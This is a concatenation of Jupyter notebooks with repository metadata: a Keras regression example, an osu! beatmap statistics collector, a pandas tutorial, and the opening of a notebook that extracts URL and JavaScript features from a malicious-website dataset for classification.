[==============================] - 0s 451us/sample - loss: 0.2781\nEpoch 64/500\n6/6 [==============================] - 0s 403us/sample - loss: 0.2723\nEpoch 65/500\n6/6 [==============================] - 0s 398us/sample - loss: 0.2667\nEpoch 66/500\n6/6 [==============================] - 0s 590us/sample - loss: 0.2613\nEpoch 67/500\n6/6 [==============================] - 0s 413us/sample - loss: 0.2559\nEpoch 68/500\n6/6 [==============================] - 0s 440us/sample - loss: 0.2506\nEpoch 69/500\n6/6 [==============================] - 0s 511us/sample - loss: 0.2455\nEpoch 70/500\n6/6 [==============================] - 0s 389us/sample - loss: 0.2405\nEpoch 71/500\n6/6 [==============================] - 0s 464us/sample - loss: 0.2355\nEpoch 72/500\n6/6 [==============================] - 0s 531us/sample - loss: 0.2307\nEpoch 73/500\n6/6 [==============================] - 0s 685us/sample - loss: 0.2259\nEpoch 74/500\n6/6 [==============================] - 0s 830us/sample - loss: 0.2213\nEpoch 75/500\n6/6 [==============================] - 0s 590us/sample - loss: 0.2168\nEpoch 76/500\n6/6 [==============================] - 0s 622us/sample - loss: 0.2123\nEpoch 77/500\n6/6 [==============================] - 0s 604us/sample - loss: 0.2079\nEpoch 78/500\n6/6 [==============================] - 0s 613us/sample - loss: 0.2037\nEpoch 79/500\n6/6 [==============================] - 0s 616us/sample - loss: 0.1995\nEpoch 80/500\n6/6 [==============================] - 0s 614us/sample - loss: 0.1954\nEpoch 81/500\n6/6 [==============================] - 0s 542us/sample - loss: 0.1914\nEpoch 82/500\n6/6 [==============================] - 0s 684us/sample - loss: 0.1874\nEpoch 83/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.1836\nEpoch 84/500\n6/6 [==============================] - 0s 
660us/sample - loss: 0.1798\nEpoch 85/500\n[epochs 85-499: per-epoch Keras progress output truncated for brevity — the loss decreases steadily from 0.1761 down to about 3.3e-05]\nEpoch 500/500\n6/6 [==============================] - 0s 690us/sample - loss: 3.2004e-05\n"
]
],
[
[
"Ok, now you have a model that has been trained to learn the relationshop between X and Y. You can use the **model.predict** method to have it figure out the Y for a previously unknown X. So, for example, if X = 10, what do you think Y will be? Take a guess before you run this code:",
"_____no_output_____"
]
],
[
[
"print(model.predict([10.0]))",
"[[18.983494]]\n"
],
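[
"# Sanity check (a sketch added for illustration, assuming `model` is the\n# single Dense(1) Keras model trained above): the learned weight and bias\n# should land close to 2 and -1, matching Y = 2X - 1.\nprint(model.get_weights())",
"_____no_output_____"
]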
],
[
[
"You might have thought 19, right? But it ended up being a little under. Why do you think that is? \n\nRemember that neural networks deal with probabilities, so given the data that we fed the NN with, it calculated that there is a very high probability that the relationship between X and Y is Y=2X-1, but with only 6 data points we can't know for sure. As a result, the result for 10 is very close to 19, but not necessarily 19. \n\nAs you work with neural networks, you'll see this pattern recurring. You will almost always deal with probabilities, not certainties, and will do a little bit of coding to figure out what the result is based on the probabilities, particularly when it comes to classification.\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70881972769948f30a150fdd033fd57c0b70dcb | 25,906 | ipynb | Jupyter Notebook | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | A_Year_In_Mapping_2020.ipynb | tommy9301122/A_Year_In_Mapping_2020 | 6a142076fea0f734b701db25326333e261b2255d | [
"MIT"
] | null | null | null | 40.732704 | 228 | 0.373234 | [
[
[
"import warnings\nwarnings.filterwarnings('ignore')\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_columns', 100)\nimport requests\nfrom IPython.display import clear_output\nfrom tqdm.notebook import tqdm\nimport datetime",
"_____no_output_____"
],
[
"start_date = '2007-10-06'\nend_date = '2021-02-17'",
"_____no_output_____"
]
],
[
[
"### API抓資料",
"_____no_output_____"
]
],
[
[
"d_api = {}\nd_i = 0 \nsince_date = start_date\nwhile since_date < end_date:\n \n get_beatmaps = requests.get('https://osu.ppy.sh/api/get_beatmaps?k=***************************&m=0&since='+since_date).json() # API v1 key\n clear_output()\n for i in get_beatmaps:\n d_api[d_i] = i\n d_i = d_i+1\n last_date = i['approved_date']\n since_date = datetime.datetime.strptime(last_date, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d')\n print(since_date)\n \ndf_api = pd.DataFrame.from_dict(d_api, \"index\")\ndf_api = df_api.drop_duplicates(['beatmapset_id','beatmap_id'], keep='first') # 去重複\ndf_api = df_api.loc[df_api.approved_date <= end_date] # 固定時間\nclear_output()\n\nbeatmapset_counts = len(df_api.beatmapset_id.value_counts())\nfirst_ranked_date = df_api.head(1).approved_date.values[0]\nlast_ranked_date = df_api.tail(1).approved_date.values[0]\n\nprint('Done!')\nprint(str(beatmapset_counts)+' mapsets ')\nprint(str(first_ranked_date) + ' to ' + str(last_ranked_date))",
"Done!\n21388 mapsets \n2007-10-06 17:46:31 to 2021-02-16 23:02:02\n"
]
],
[
[
"### 整理",
"_____no_output_____"
]
],
[
[
"# Rank & Love\ndf_rank_map = df_api.loc[(df_api.approved=='1')|(df_api.approved=='4')]\ndf_rank_map['status'] = df_rank_map.approved.map({'1':'Rank','4':'Love'})\n#print(df_rank_map.status.value_counts())\n\n\nprint('clean data....')\n# 難度\ndf_rank_map['difficulty_rating'] = df_rank_map['difficultyrating'].apply(lambda x:'Easy' if float(x)<2 else(\n 'Normal' if float(x)>=2 and float(x)<2.7 else(\n 'Hard' if float(x)>=2.7 and float(x)<4 else(\n 'Insane' if float(x)>=4 and float(x)<5.3 else(\n 'Expert' if float(x)>=5.3 and float(x)<6.5 else'Expert+')))))\n\n# 類別ID轉名稱\ndf_rank_map['genre_id'] = df_rank_map.genre_id.map({'1':'Unspecified',\n '2':'Video Game',\n '3':'Anime',\n '4':'Rock',\n '5':'Pop',\n '6':'Other',\n '7':'Novelty',\n '8':'Hip Hop',\n '9':'Electronic',\n '10':'Metal',\n '11':'Classical',\n '12':'Folk',\n '13':'Jazz'})\n\n# 語言ID轉名稱\ndf_rank_map['language_id'] = df_rank_map.language_id.map({'1':'Unspecified',\n '2':'English',\n '3':'Japanese',\n '4':'Chinese',\n '5':'Instrumental',\n '6':'Korean',\n '7':'FrenchItalian',\n '8':'German',\n '9':'Swedish',\n '10':'Spanish',\n '11':'Polish',\n '12':'Russian',\n '14':'Other'})\n\n# 將title和artist的unicode遺失值用英文補齊\ndf_rank_map['artist_unicode'] = df_rank_map['artist_unicode'].fillna(df_rank_map['artist'])\ndf_rank_map['title_unicode'] = df_rank_map['title_unicode'].fillna(df_rank_map['title'])\n\n# 類別、語言 補遺失值\ndf_rank_map['genre_id'] = df_rank_map['genre_id'].fillna('Unspecified')\ndf_rank_map['language_id'] = df_rank_map['language_id'].fillna('Unspecified')\n\n# 指定所需欄位\ndf_rank_map_overview = df_rank_map[['beatmapset_id','beatmap_id',\n 'genre_id','language_id','status',\n 'title_unicode','artist_unicode',\n 'approved_date',\n 'version','difficulty_rating',\n 'creator_id',\n 'favourite_count','playcount']] \n# 欄位資料型態\ndf_rank_map_overview = df_rank_map_overview.astype({'beatmapset_id':'int64',\n 'favourite_count':'int64',\n 'playcount':'int64'})\ndf_rank_map_overview['approved_date'] = pd.to_datetime(df_rank_map_overview['approved_date'], format='%Y-%m-%d %H:%M:%S')\n\n# groupby\ndf_rank_mapset_overview = df_rank_map_overview.groupby('beatmapset_id').agg({'beatmap_id':'count',\n 'status':'min',\n 'genre_id':'min',\n 'language_id':'min',\n 'title_unicode':'min', \n 'artist_unicode':'min',\n 'creator_id':'min', \n 'approved_date':'min', \n 'favourite_count':'min',\n 'playcount':'sum'}).reset_index(drop=False)",
"clean data....\n"
],
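[
"# Equivalent binning (added sketch): pd.cut can express the nested ternary\n# star-rating buckets above more readably; right=False makes the intervals\n# half-open [a, b), matching the conditions in the lambda.\nbins = [-float('inf'), 2, 2.7, 4, 5.3, 6.5, float('inf')]\nlabels = ['Easy', 'Normal', 'Hard', 'Insane', 'Expert', 'Expert+']\npd.cut(df_rank_map['difficultyrating'].astype(float), bins=bins, labels=labels, right=False)",
"_____no_output_____"
],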
[
"# API找出麻婆國籍 並統一使用者名稱\ndef get_country_username(creator_id):\n try:\n q = requests.get('https://osu.ppy.sh/api/get_user?k=*************************&u='+creator_id).json()[0]\n q_country = q.get('country')\n q_username = q.get('username') \n return [q_country, q_username]\n except:\n return [np.nan, np.nan]\n\n\nprint('add country and username ....')\ndf_country = df_rank_mapset_overview[['creator_id']].drop_duplicates('creator_id', keep='first')\ncreator_id_list = df_country.creator_id.to_list()\ncountry_username_list = []\nfor creator_id in tqdm(creator_id_list):\n country_username_list.append( get_country_username(creator_id) )\n\n\ndf_country_username = pd.DataFrame(country_username_list, columns=['country','mapper'])\ndf_country = df_country.reset_index( drop=True) \ndf_country = pd.concat([df_country, df_country_username], axis=1)\n\ndf_rank_mapset_overview = pd.merge(df_rank_mapset_overview, df_country, how='left' ,on='creator_id')",
"_____no_output_____"
]
],
[
[
"### Done",
"_____no_output_____"
]
],
[
[
"# 欄位名稱取名\ndf_rank_mapset_overview = df_rank_mapset_overview.rename(columns={'beatmap_id': 'beatmap_count',\n 'genre_id':'genre',\n 'language_id':'language',\n 'title_unicode':'title', \n 'artist_unicode':'artist',\n 'creator_id':'mapper_id'\n }) \n# 縮圖網址\n#df_rank_mapset_overview['beatmap_thumbnail'] = df_rank_mapset_overview['beatmapset_id'].apply(lambda x: 'https://b.ppy.sh/thumb/'+str(x)+'l.jpg') \n#df_rank_mapset_overview['mapper_thumbnail'] = df_rank_mapset_overview['mapper_id'].apply(lambda x: 'http://s.ppy.sh/a/'+str(x))\n\ndf_rank_mapset_overview = df_rank_mapset_overview[['beatmapset_id','beatmap_count','title','artist',\n 'mapper','mapper_id','approved_date','favourite_count','playcount',\n 'genre','language','country','status']] #'beatmap_thumbnail','mapper_thumbnail',\ndf_rank_mapset_overview",
"_____no_output_____"
],
[
"df_rank_mapset_overview.to_csv('Mapping_Overview_20210218.csv', index=False, encoding='utf_8_sig')",
"_____no_output_____"
]
],
[
[
"### 其他統計",
"_____no_output_____"
]
],
[
[
"df_other = df_rank_map[['beatmapset_id','beatmap_id','status','title_unicode','artist_unicode','version','creator_id','creator','hit_length','bpm','storyboard','diff_size','count_normal','count_slider','count_spinner']]\ndf_other = df_other.astype({'bpm':'float64','hit_length':'int64','storyboard':'int64','diff_size':'float64','count_normal':'int64','count_slider':'int64','count_spinner':'int64'})\ndf_other['max_combo'] = df_other['count_normal']+df_other['count_slider']+df_other['count_spinner']\ndf_other['total_length_class'] = df_other['hit_length'].apply(lambda x:'< 1:39' if x<99 else(\n '1:39 ~ 3:29' if x>=99 and x<209 else(\n '3:29 ~ 5:00' if x>=209 and x<300 else '> 5:00')))\ndf_other['total_length'] = df_other['hit_length'].apply(lambda x: \"%02d:%02d\" % (divmod(x, 60)[0], divmod(x, 60)[1]))",
"_____no_output_____"
],
[
"df_other_mapset = df_other.groupby('beatmapset_id').agg({'beatmap_id':'count',\n 'status':'max',\n 'title_unicode':'max',\n 'artist_unicode':'max',\n 'creator_id':'max',\n 'creator':'max',\n 'bpm':'max',\n 'storyboard':'max',\n 'count_normal':'sum',\n 'count_slider':'sum',\n 'count_spinner':'sum',\n 'total_length_class':'max',\n 'total_length':'max'}).reset_index(drop=False)\ndf_other_mapset",
"_____no_output_____"
],
[
"# CS10\ndf_other.loc[df_other.diff_size==10][['beatmapset_id','beatmap_id','title_unicode','artist_unicode','version','creator_id','creator']]",
"_____no_output_____"
],
[
"# BPM\ndf_other.sort_values(by='bpm', ascending=False).head(1)[['beatmapset_id','title_unicode','artist_unicode','creator_id','creator','bpm']]",
"_____no_output_____"
],
[
"# max_combo\ndf_other.sort_values(by='max_combo', ascending=False).head(1)[['beatmapset_id','beatmap_id','title_unicode','artist_unicode','version','creator_id','creator','total_length_class','hit_length','max_combo']]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e70897e6d10a1dddacad33e1ee05864fb94163a0 | 85,377 | ipynb | Jupyter Notebook | Lecture/.ipynb_checkpoints/6. Pandas 02-checkpoint.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | 1 | 2021-09-17T08:25:53.000Z | 2021-09-17T08:25:53.000Z | Lecture/6. Pandas 02.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | null | null | null | Lecture/6. Pandas 02.ipynb | saeed-saffari/UT-workshop-sum2021 | 8956fa6bc8df00cb542b550124d437dbea3df799 | [
"MIT"
] | 4 | 2021-09-16T20:10:14.000Z | 2022-02-09T07:27:59.000Z | 25.918944 | 122 | 0.3078 | [
[
[
"# <center> Pandas 02 <center>",
"_____no_output_____"
],
[
"<img src = 'https://github.com/saeed-saffari/alzahra-workshop-spr2021/blob/main/lecture/PIC/Pandas.png?raw=true' \n width = \"550\"\n >",
"_____no_output_____"
],
[
"## Imports",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"## Na, NAN",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame({\n 'col1':[1,2,3,4,np.nan],\n 'col2':[np.nan,555,np.nan,444, 333],\n 'col3':['abc', 'def', 'ghi', 'xyz', 'ghj'],\n 'col4':['16', '23', '18', '25', '27'],\n 'col5':['187', '160', np.nan, '202', '163']\n})\ndf",
"_____no_output_____"
],
[
"df.isnull()",
"_____no_output_____"
],
[
"df.dropna()",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
],
[
"df.fillna(120)",
"_____no_output_____"
],
[
"df.fillna('missing')",
"_____no_output_____"
],
[
"df.fillna(method= 'ffill')",
"_____no_output_____"
],
[
"df.fillna(method= 'ffill').dropna()",
"_____no_output_____"
],
[
"df.fillna(method= 'bfill')",
"_____no_output_____"
],
[
"df.interpolate()",
"_____no_output_____"
],
[
"df[['col4', 'col5']] = df[['col4', 'col5']].astype(float)",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
],
[
"df.interpolate()",
"_____no_output_____"
],
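[
"# Note (added sketch): interpolate() only fills numeric columns — which is\n# why col4 and col5 were cast to float above; object columns like col3 are\n# left untouched.\ndf.dtypes",
"_____no_output_____"
]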
],
[
[
"## Concat",
"_____no_output_____"
]
],
[
[
"df1 = pd.DataFrame({\n 'A': ['A0', 'A1', 'A2', 'A3'],\n 'B': ['B0', 'B1', 'B2', 'B3'],\n 'C': ['C0', 'C1', 'C2', 'C3'],\n 'D': ['D0', 'D1', 'D2', 'D3']},\n index=[0, 1, 2, 3])\n\ndf2 = pd.DataFrame({\n 'A': ['A4', 'A5', 'A6', 'A7'],\n 'B': ['B4', 'B5', 'B6', 'B7'],\n 'C': ['C4', 'C5', 'C6', 'C7'],\n 'D': ['D4', 'D5', 'D6', 'D7']},\n index=[4, 5, 6, 7])",
"_____no_output_____"
],
[
"df1",
"_____no_output_____"
],
[
"df2",
"_____no_output_____"
],
[
"pd.concat([df1, df2], axis = 0)",
"_____no_output_____"
],
[
"pd.concat([df1, df2], axis = 1)",
"_____no_output_____"
],
[
"df3 = pd.DataFrame({\n 'E': ['E0', 'E1', 'E2', 'E3'],\n 'F': ['F0', 'F1', 'F2', 'F3'],\n 'G': ['G0', 'G1', 'G2', 'G3'],\n 'H': ['H0', 'H1', 'H2', 'H3']},\n index=[0, 1, 2, 3])\ndf3",
"_____no_output_____"
],
[
"pd.concat([df1, df3], axis = 1)",
"_____no_output_____"
]
],
[
[
"## Merge",
"_____no_output_____"
]
],
[
[
"left = pd.DataFrame({\n 'key': ['k0', 'k1', 'k2', 'k3'],\n 'A' : ['A0', 'A1', 'A2', 'A3'],\n 'B' : ['B0', 'B1', 'B2', 'B3']})\n\nright = pd.DataFrame({\n 'key': ['k0', 'k1', 'k2', 'k4'],\n 'C' : ['C0', 'C1', 'C2', 'C4'],\n 'D' : ['D0', 'D1', 'D2', 'D4']})",
"_____no_output_____"
],
[
"left",
"_____no_output_____"
],
[
"right",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'inner', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'outer', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'right', on = 'key')",
"_____no_output_____"
],
[
"pd.merge(left, right, how = 'left', on = 'key')",
"_____no_output_____"
]
],
[
[
"## Group by",
"_____no_output_____"
]
],
[
[
"data = {\n 'Company': ['GOOG', 'GOOG','GOOG', 'MSFT', 'MSFT', 'FB', 'FB'],\n 'Person' : ['Sam', 'Charlie', 'John', 'Amy', 'Vanessa', 'Carl', 'Sarah'],\n 'Sales' : [200, 120, 236, 340, 124, 243, 350]\n}",
"_____no_output_____"
],
[
"df = pd.DataFrame(data)\ndf",
"_____no_output_____"
],
[
"by_comp = df.groupby('Company')",
"_____no_output_____"
],
[
"by_comp",
"_____no_output_____"
],
[
"by_comp.mean()",
"_____no_output_____"
],
[
"by_comp.std()",
"_____no_output_____"
],
[
"by_comp.mean()",
"_____no_output_____"
],
[
"by_comp.max()",
"_____no_output_____"
],
[
"by_comp.count()",
"_____no_output_____"
],
[
"by_comp.describe()",
"_____no_output_____"
],
[
"by_comp.describe().columns",
"_____no_output_____"
],
[
"by_comp.describe()['Sales']",
"_____no_output_____"
],
[
"by_comp.describe()['Sales']['max']",
"_____no_output_____"
],
[
"x = by_comp.describe()['Sales'][['max', 'min']]\nx",
"_____no_output_____"
],
[
"x['diffrence'] = x['max'] - x['min']\nx",
"_____no_output_____"
],
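[
"# Equivalent one-liner (added sketch): aggregate the spread directly on the\n# grouped column instead of going through describe().\nby_comp['Sales'].agg(lambda s: s.max() - s.min())",
"_____no_output_____"
]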
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7089d0d9044ac367763f3a1a28e4db16b0d1a13 | 512,346 | ipynb | Jupyter Notebook | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | 1 | 2022-03-20T05:29:34.000Z | 2022-03-20T05:29:34.000Z | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | 1 | 2022-03-16T11:05:27.000Z | 2022-03-16T11:05:27.000Z | Dataset_20_phase_2_ML.ipynb | AhmadChaiban/Malicious-Website-Feature-Study | 3e2aafc0d17ea36371dd561d1cb3503eaae7495a | [
"Apache-2.0"
] | null | null | null | 117.375945 | 109,752 | 0.845718 | [
[
[
"# Dataset 20 Phase 2 Machine Learning Notebook",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport codecs\n\nfrom glob import glob as globlin\n\nfrom tqdm import tqdm\nfrom tqdm import tqdm_notebook\n\nfrom xgboost import XGBClassifier\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score\nfrom sklearn.svm import libsvm\n\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import plot, iplot\nimport plotly.express as px\n\nfrom bs4 import BeautifulSoup\n\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\n\nlibsvm.set_verbosity_wrap(1)\ntqdm.pandas()\n\n## For debugging \n\nimport signal\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef timeout(time):\n # Register a function to raise a TimeoutError on the signal.\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after ``time``.\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError:\n return 'timeout error'\n finally:\n # Unregister the signal so it won't be triggered\n # if the timeout is not reached.\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n\n\ndef raise_timeout(signum, frame):\n raise TimeoutError",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/sklearn/utils/deprecation.py:143: FutureWarning: The sklearn.svm.libsvm module is deprecated in version 0.22 and will be removed in version 0.24. The corresponding classes / functions should instead be imported from sklearn.svm. Anything that cannot be imported from sklearn.svm is now part of the private API.\n warnings.warn(message, FutureWarning)\n"
],
[
"dataset_benign = pd.read_csv('./')",
"_____no_output_____"
],
[
"dataset_20 = pd.read_csv('dataset_20_new_features.csv').drop(columns = ['Unnamed: 0'])\ndataset_20.head(1)",
"_____no_output_____"
]
],
[
[
"## Additional malicious Data",
"_____no_output_____"
]
],
[
[
"dataset_https = pd.read_csv('./addon_features/final_malicious_features_https.csv')\ndataset_https['https'].value_counts()",
"_____no_output_____"
],
[
"dataset_tld_urllen = pd.read_csv('./addon_features/final_malicious_features_tld_urllen.csv')\ndataset_tld_urllen['tld'].value_counts()",
"_____no_output_____"
],
[
"plt.figure(figsize=(35,10))\nplt.hist(dataset_tld_urllen['tld'], bins=341)\nplt.xticks(rotation=90)\nplt.show()",
"_____no_output_____"
],
[
"dataset_content = pd.read_csv('./addon_features/final_malicious_content.csv')\nlen(dataset_content[dataset_content['content'] == 'could not fetch content'])",
"_____no_output_____"
],
[
"dataset_whois = pd.read_csv('./addon_features/final_malicious_whois.csv')\ndataset_whois['who_is'].value_counts()",
"_____no_output_____"
],
[
"dataset_supp = pd.concat([\n dataset_tld_urllen, dataset_https['https'], dataset_whois['who_is'],\n dataset_content['content']\n],\n axis=1).drop(columns=['Unnamed: 0'])",
"_____no_output_____"
],
[
"dataset_supp['URL']",
"_____no_output_____"
]
],
[
[
"### Saving HTML files for supplementary data for deobfuscation",
"_____no_output_____"
]
],
[
[
"# def save_content_as_html(content, counter):\n# with open(f'./deobfuscation/html_obf2/{counter}.html', 'w') as f:\n# f.write(str(content))\n\n \n# html_capture = dataset_supp.nlargest(100, 'js_len').progress_apply(\n# lambda row: save_content_as_html(row['content'], row.name), axis=1)",
"_____no_output_____"
]
],
[
[
"### Getting deobfuscated content",
"_____no_output_____"
]
],
[
[
"paths = globlin('./deobfuscation/html_deobf/*.html')\nfor path in tqdm(paths):\n index_ = int(path.split('/')[-1].replace('.html', ''))\n with open(f'./deobfuscation/html_deobf/{index_}.html', 'r') as f:\n dataset_supp['content'].iloc[index_] = f.read()",
" 0%| | 0/901 [00:00<?, ?it/s]/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/pandas/core/indexing.py:205: SettingWithCopyWarning:\n\n\nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n\n100%|██████████| 901/901 [00:03<00:00, 296.04it/s]\n"
]
],
[
[
"### Get Javascript Length",
"_____no_output_____"
]
],
[
[
"## generic js\ntags_of_interest = ['<script type=\"text/javascript\">', '<script>']\n\ngeneric_js = []\n\nsoup = BeautifulSoup(dataset_supp['content'].iloc[13000], 'html.parser')\njs = soup.find_all('script')\ngeneric_js.append(str(js[0]))\ngeneric_js.append(str(js[1]))\n\nsoup = BeautifulSoup(dataset_supp['content'].iloc[14958], 'html.parser')\njs = soup.find_all('script')\ngeneric_js.append(str(js[0]))\ngeneric_js.append(str(js[2]))\n\ngeneric_js.append('function_to_hack')\n\n# complete_js = ''\n# for tag in js:\n# for tag_int in tags_of_interest:\n# if tag_int in str(tag):\n# print(tag)\n# break",
"_____no_output_____"
],
[
"def get_js_length(content, supp=False):\n concat_js = ''\n # ('97)?\\s*(.*)<\\s*script[^>]>\\s*(.*)(<\\s*/\\s*script\\s*>)?\n if not supp:\n regex_ = r\"('97)?\\s*(.*)(<\\s*script[^>]>)?\\s*(.*)(<\\s*/\\s*script\\s*>)?\"\n js = re.findall(regex_, content, flags=(re.DOTALL | re.IGNORECASE))\n try:\n for tuple_element in js[0]:\n concat_js = tuple_element + concat_js\n complete_js = ''.join(concat_js)\n return len(complete_js.encode('utf-8')) / 10\n except:\n complete_js = ''.join(js)\n return len(complete_js.encode('utf-8')) / 10\n else:\n soup = BeautifulSoup(content, 'html.parser')\n js = soup.find_all('script')\n complete_js = ''\n for tag in js:\n for tag_int in tags_of_interest:\n if tag_int in str(tag) and all(g_js not in str(tag)\n for g_js in generic_js):\n complete_js += str(tag).replace(tag_int, '').replace(\n '</script>', '')\n return len(complete_js.encode('utf-8')) / 10\n\n\ndataset_supp['js_len'] = dataset_supp['content'].progress_apply(\n lambda content: get_js_length(str(content), True))\ndataset_20['js_len'] = dataset_20['content'].progress_apply(\n lambda content: get_js_length(str(content)))",
" 19%|█▊ | 3107/16740 [01:00<02:44, 83.04it/s] /Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/bs4/__init__.py:314: UserWarning:\n\n\"b'.'\" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.\n\n100%|██████████| 16740/16740 [03:06<00:00, 89.89it/s] \n100%|██████████| 1313575/1313575 [00:38<00:00, 34067.99it/s]\n"
],
[
"dataset_20.nlargest(900, 'js_len')['js_len']",
"_____no_output_____"
],
[
"dataset_supp.nlargest(100, 'js_len')['js_len']",
"_____no_output_____"
]
],
[
[
"### Dropping 100 largest (outliers)",
"_____no_output_____"
]
],
[
[
"dataset_supp = dataset_supp.drop(dataset_supp.nlargest(100, 'js_len').index, axis='index')",
"_____no_output_____"
],
[
"# soup = BeautifulSoup(x, 'html.parser')\n# js = soup.find_all('script')\n# complete_js = ''\n# for tag in js:\n# for tag_int in tags_of_interest:\n# if tag_int in str(tag) and all(g_js not in str(tag) for g_js in generic_js):\n# complete_js += str(tag).replace(tag_int, '').replace('</script>', '')",
"_____no_output_____"
],
[
"# complete_js",
"_____no_output_____"
],
[
"# len(complete_js)",
"_____no_output_____"
],
[
"# <script type=\"text/javascript\">\n# <script>",
"_____no_output_____"
],
[
"# to_check = dataset_20[dataset_20['label']=='good'].iloc[0]['content']\n# print(get_js_length(to_check))\n# print(to_check)",
"_____no_output_____"
],
[
"# dataset_20['js_len_2'] = dataset_20['content'].progress_apply(lambda content: get_js_length(str(content)))",
"_____no_output_____"
],
[
"# dataset_20['js_len_2']",
"_____no_output_____"
],
[
"# dataset_20['js_len']",
"_____no_output_____"
]
],
[
[
"### Number function calls in JS ",
"_____no_output_____"
]
],
[
[
"dataset_supp['num_js_func_calls'] = dataset_supp['content'].progress_apply(\n lambda x: len(str(x).split('()')))\ndataset_20['num_js_func_calls'] = dataset_20['content'].progress_apply(\n lambda x: len(str(x).split('()')))",
"100%|██████████| 16640/16640 [00:00<00:00, 28027.38it/s]\n100%|██████████| 1313575/1313575 [00:06<00:00, 190270.64it/s]\n"
],
[
"dataset_20.columns",
"_____no_output_____"
],
[
"dataset_supp.columns",
"_____no_output_____"
],
[
"dataset_supp.columns = [\n 'url', 'label', 'has_IP_in_URL', 'number_subdomains', 'hostname',\n 'length_hostname', 'ratio_digits_url', 'having_@_in_url',\n 'ratio_digits_hostname', 'number_underscores', 'tld', 'url_len', 'https',\n 'who_is', 'content', 'js_len', 'num_js_func_calls'\n]",
"_____no_output_____"
],
[
"dataset_supp['label'] = 'bad'",
"_____no_output_____"
]
],
[
[
"### Encoding supplemental data",
"_____no_output_____"
]
],
[
[
"def column_adjustor(dataset_column):\n unique_values = dataset_column.unique()\n return dataset_column.progress_apply(lambda x: np.where(unique_values == x)[0][0])",
"_____no_output_____"
],
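[
"# Side note (added sketch): column_adjustor matches pandas' built-in\n# factorize, which also assigns integer codes by order of first appearance\n# and is vectorized.\ncodes, uniques = pd.factorize(pd.Series(['a', 'b', 'a', 'c']))\nprint(codes, list(uniques))",
"_____no_output_____"
],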
[
"dataset_supp['who_is'] = column_adjustor(dataset_supp['who_is'])\ndataset_supp['https'] = column_adjustor(dataset_supp['https'])\ndataset_supp['tld'] = column_adjustor(dataset_supp['tld'])",
"100%|██████████| 16640/16640 [00:00<00:00, 168509.39it/s]\n100%|██████████| 16640/16640 [00:00<00:00, 180154.77it/s]\n100%|██████████| 16640/16640 [00:00<00:00, 98426.60it/s]\n"
],
[
"dataset_20 = dataset_20.drop(columns=['latitude', 'longitude'])",
"_____no_output_____"
],
[
